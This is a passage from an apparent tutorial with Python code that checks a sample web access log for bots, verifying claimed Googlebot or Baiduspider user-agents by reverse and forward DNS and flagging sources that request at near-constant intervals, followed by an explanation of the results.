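    f"1396000007.800\t192.0.2.10\t/video/124\t{GOOGLEBOT_UA}",
    f"1396000015.200\t192.0.2.10\t/video/125\t{GOOGLEBOT_UA}",
    f"1396000000.300\t198.51.100.9\t/video/123\t{BROWSER_UA}",
    f"1396000003.700\t198.51.100.9\t/video/123/comments\t{BROWSER_UA}",
    f"1396000009.400\t198.51.100.9\t/video/777\t{BROWSER_UA}",
    f"1396000010.500\t198.51.100.9\t/static/app.js\t{BROWSER_UA}",
    f"1396000025.300\t198.51.100.9\t/video/778\t{BROWSER_UA}",
    f"1396000031.800\t198.51.100.9\t/search?q=cats\t{BROWSER_UA}",
])

# Constructed stand-ins for reverse (PTR) and forward (A) lookups so the
# example runs offline; in production these are real DNS queries.
PTR_RECORDS = {"192.0.2.10": "crawl-192-0-2-10.googlebot.com",
               "203.0.113.44": "host44.isp.example"}
A_RECORDS = {"crawl-192-0-2-10.googlebot.com": "192.0.2.10",
             "host44.isp.example": "203.0.113.44"}

# Crawler token in the user agent -> DNS suffixes its hosts resolve under
# (assumed here; confirm against each operator's published guidance).
CRAWLER_DOMAINS = {"Googlebot": ("googlebot.com", "google.com"),
                   "Baiduspider": ("baidu.com", "baidu.jp")}


def parse_log(text):
    records = []
    for line in text.splitlines():
        ts, ip, path, ua = line.split("\t")
        records.append({"ts": float(ts), "ip": ip, "path": path, "ua": ua})
    return records


def claimed_crawler(ua):
    return next((name for name in CRAWLER_DOMAINS if name in ua), None)


def verify_crawler(ip, ua, ptr=PTR_RECORDS, fwd=A_RECORDS):
    """'no-claim' if the UA names no crawler; 'verified' only if the
    reverse name sits under an expected suffix AND resolves forward to
    the same address; otherwise 'fake'."""
    name = claimed_crawler(ua)
    if name is None:
        return "no-claim"
    host = ptr.get(ip)
    if host is None or not any(host == d or host.endswith("." + d)
                               for d in CRAWLER_DOMAINS[name]):
        return "fake"
    return "verified" if fwd.get(host) == ip else "fake"


def metronomic_sources(records, min_requests=5, max_relative_jitter=0.05):
    """Sources whose inter-request gaps barely vary: people browse in
    bursts, a script firing on a timer does not.  Returns ip -> mean gap."""
    by_ip = defaultdict(list)
    for r in records:
        by_ip[r["ip"]].append(r["ts"])
    flagged = {}
    for ip, times in by_ip.items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean > 0 and statistics.pstdev(gaps) <= max_relative_jitter * mean:
            flagged[ip] = round(mean, 3)
    return flagged


def triage(log_text):
    """Combine both checks: ip -> list of findings."""
    records = parse_log(log_text)
    findings = defaultdict(list)
    for ip, ua in sorted({(r["ip"], r["ua"]) for r in records}):
        if verify_crawler(ip, ua) == "fake":
            findings[ip].append(f"user-agent claims {claimed_crawler(ua)} but DNS does not verify")
    for ip, gap in metronomic_sources(records).items():
        findings[ip].append(f"requests every {gap}s with almost no jitter")
    return dict(findings)


if __name__ == "__main__":
    for ip, notes in triage(ACCESS_LOG).items():
        print(ip, "->", "; ".join(notes))
```

On the constructed log only 203.0.113.44 is reported, on both counts: its reverse name is an ordinary ISP host rather than a googlebot.com name, and its six requests arrive at almost exactly one-second intervals. The genuine crawler verifies and is left alone, and the human visitor makes no crawler claim and browses in irregular bursts. A verdict of "fake" is a strong signal because a spoofed user-agent cannot control the PTR record of the address it really sends from; the timing check is weaker on its own and is best used to raise the level of challenge rather than to block outright.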
